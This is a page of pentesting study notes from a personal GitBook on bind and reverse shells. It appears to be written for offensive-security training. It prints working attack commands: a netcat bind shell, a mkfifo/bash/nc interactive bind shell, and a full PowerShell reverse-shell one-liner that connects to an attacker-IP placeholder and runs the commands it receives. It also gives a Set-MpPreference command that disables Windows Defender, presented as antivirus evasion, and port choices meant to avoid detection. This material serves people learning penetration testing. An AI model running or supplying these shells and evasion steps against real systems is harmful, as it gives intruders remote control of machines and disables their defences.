Noirchapeau's Gitbook
Noirchapeau
Noirchapeau
  • Welcome to NoirChapeau Gitbook
  • Network Mapping and Security Auditing Tool
  • Footprinting - Enumeration and Information Gathering Notes
    • FTP Pentesting Notes
    • SMB Pentesting Notes
    • SSH Pentesting Notes
    • IPMI Pentesting Notes
    • Oracle TNS Pentesting Notes
    • MSSQL Pentesting Notes
    • MySQL Pentesting Notes
    • SNMP Pentesting Notes
    • IMAP/POP3 Pentesting Notes
    • SMTP Pentesting Notes
    • DNS Pentesting Notes
    • NFS Pentesting Notes
  • Web Reconnaissance Notes
  • Vulnerability Assessment Notes
    • Nessus Vulnerability Scanner Notes
    • OpenVAS (GVM) Vulnerability Scanner Notes
  • File Transfer Techniques for Pentesting
    • Advanced File Transfer Techniques
    • File Transfer Detection & Evasion Techniques
  • Shells & Payloads: Shell Overview
    • Shells & Payloads: Payloads Overview
    • Shells & Payloads: Web Shells Overview
    • Shells & Payloads: Detection & Prevention
  • Metasploit
    • Working with Metasploit Modules
    • Targets and Payloads
    • Encoders & Msfvenom: Advanced Exploitation Techniques
    • Database Management in Metasploit
    • Sessions and Jobs
    • Writing and Importing Custom Modules into Metasploit
    • Firewall and IDS/IPS Evasion
  • Password Attacks
    • Remote Password Attacks
    • Windows Local Password Attacks
    • Linux Local Password Attacks
    • Windows Lateral Movement
    • Files & Archives Cracking
    • Password Management
  • Interacting with Common Services
    • Protocol Specific Attacks
Powered by GitBook
On this page
  • Introduction
  • Shell Types Overview
  • 1. Bind Shells
  • 2. Reverse Shells
  • Shell Environment Identification
  • Common Terminal Emulators
  • Shell Recognition Commands
  • Best Practices & Tips
  • 1. Port Selection
  • 2. Antivirus Evasion
  • 3. Firewall Considerations
  • 4. Shell Stabilization
  • Payload Types
  • Security Implications
  • Quick Reference
  • Common Shell Indicators
  • Key Commands Cheatsheet

Shells & Payloads: Shell Overview

Introduction

  • Shell Definition: Programs providing CLI (Command Line Interface) access to systems

    • Common terminology: "catching" or "popping" a shell = successful remote access

    • Primary goal: Obtain interactive system control for:

      • Privilege escalation

      • System pivoting

      • File transfers

      • Persistence establishment

Shell Types Overview

1. Bind Shells

  • Definition: Listener running on target system awaiting attacker connection

  • Key Characteristics:

    • Requires target to run listener

    • Often blocked by firewalls

    • Best suited for internal network testing

Basic Bind Shell Setup

# On target system (listener):
nc -lvnp 7777

# On attacker system (client):
nc -nv <target-IP> 7777

Interactive Bind Shell Setup

# On target system:
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l <target-IP> 7777 > /tmp/f

2. Reverse Shells

  • Definition: Target initiates connection to attacker's system

  • Advantages:

    • Better firewall bypass (uses outbound connections)

    • More successful in real-world scenarios

    • Easier to maintain persistence

Basic Reverse Shell Setup

# On attacker system (listener):
sudo nc -lvnp 443

# On Windows target (PowerShell):
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker-IP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Shell Environment Identification

Common Terminal Emulators

  • Windows: Windows Terminal, cmder, PuTTY

  • Linux: xterm, GNOME Terminal, Konsole

  • MacOS: Terminal, iTerm2

  • Cross-platform: kitty, Alacritty

Shell Recognition Commands

# View current shell process
ps

# Check shell environment variables
env | grep SHELL

Best Practices & Tips

1. Port Selection

  • Use common ports for better evasion:

    • 443 (HTTPS)

    • 80 (HTTP)

    • Avoid suspicious uncommon ports

2. Antivirus Evasion

# Disable Windows Defender (if needed)
Set-MpPreference -DisableRealtimeMonitoring $true

3. Firewall Considerations

  • Bind shells:

    • Require incoming connections

    • Often blocked by firewalls

    • Best for internal testing

  • Reverse shells:

    • Use outbound connections

    • Better success rate

    • Preferred for external testing

4. Shell Stabilization

  • Consider using:

    • Named pipes for persistence

    • Error handling for stability

    • Proper cleanup after session

Payload Types

  • Network data packets

  • Programming instructions

  • Various malware forms

  • Command execution scripts

Security Implications

  • Shells provide direct OS access

  • Enable system command control

  • Facilitate data exfiltration

  • Allow privilege escalation

  • Support lateral movement

Quick Reference

Common Shell Indicators

  • $ prompt = Bash/Ksh/POSIX shell

  • > prompt = Windows CMD

  • PS> prompt = PowerShell

Key Commands Cheatsheet

# Basic listener
nc -lvnp <port>

# Basic connection
nc -nv <IP> <port>

# Check current shell
echo $SHELL

# Create named pipe
mkfifo /tmp/f
PreviousFile Transfer Detection & Evasion TechniquesNextShells & Payloads: Payloads Overview